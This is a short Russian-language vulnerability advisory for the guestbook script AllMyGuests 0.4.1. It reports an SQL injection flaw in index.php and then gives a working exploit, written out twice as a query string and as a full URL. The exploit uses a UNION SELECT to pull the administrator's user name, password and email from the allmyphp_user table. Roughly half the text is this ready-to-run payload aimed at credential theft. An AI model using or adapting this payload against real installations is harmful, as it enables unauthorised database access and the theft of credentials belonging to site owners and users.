Программа: AllMyGuests 0.4.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3, concat_ws(0x203a20,user_name,user_password,user_email),5,6,7 +from+allmyphp_user+where+user_id=1--
http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id= null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password, user_email),5,6,7+from+allmyphp_user+where+user_id=1--